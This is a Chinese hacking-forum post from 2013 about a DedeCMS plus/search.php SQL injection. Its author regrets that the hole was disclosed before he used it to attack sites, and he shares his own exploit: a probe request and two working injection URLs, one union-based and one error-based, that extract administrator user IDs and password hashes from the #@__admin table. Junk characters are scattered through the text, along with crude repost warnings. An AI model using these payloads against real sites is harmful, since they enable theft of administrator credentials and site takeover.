转载不加作者名的没JJ8 L" l# Q/ p! Q2 N% ?
" V3 g4 U( n% p4 [1 j哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
) \% D. r0 g6 |1 F1 M6 n
! g& n* G5 `% ^1 T6 E: T; d既然已经发出来了,我就把我自己搞的exp发下吧。。唉。* J( v7 x$ `+ q" T3 O0 }) ?
4 E- M1 i- g# m9 ]4 }4 j' f
我一般是这样测试的:& w* E' l/ [8 m# i6 c4 ^6 O
: {- f3 H0 ]: C$ u. R
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
8 S: a: M1 Q2 g' U( O/ {0 k, g) a8 }: S% [
转载不加作者名的没JJ
0 \* o M4 y1 U7 k: C$ A
1 w; M# Y% y( [$ e1 l作者:鬼哥
+ ]3 s5 e1 j- d6 Q4 @2 }2 p% j3 b. |7 F$ W/ G
J* E3 q* X2 @ a* T/ G6 N c! M
看结果如果提示
& S' f' T9 n5 j, D5 k; a3 X0 T& ^$ Z9 ^' [1 f
Safe Alert: Request Error step 2 !
4 N9 F3 d" L" j/ i* E& K+ k+ {; G5 g7 J" A y7 M
那么直接用下面的exp
! q; y, T( o% c# x, ^
! C5 r! Q# a& M$ B2 t7 v6 bxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
# K ^0 _: S! ]) n' ^6 Y
, K+ X# P8 |) I" _5 r* K0 H( {6 s V& ?( |/ T) Y- D6 I& H
看结果如果提示
$ G! g- \/ Y/ s9 Y9 L9 }9 ~* o" \3 C( R& D
Safe Alert: Request Error step 1 !* A0 T3 a$ }, O
7 q* J& P& i' k4 P' z! o; @& ~; `那么直接用下面的exp
4 t: }- Y- C0 W, U( m
0 m% }. J5 v4 `1 oxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
/ t# n n! Y" A9 c% t# |2 H, [ p
( F4 Z+ W) m$ H) j# T8 \3 Y5 q4 {& n0 o
如果正常显示证明漏洞不存在了。6 _# C6 V; f0 W& b3 [( d
! ] h& Y( X' U2 t) h! z5 Z
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对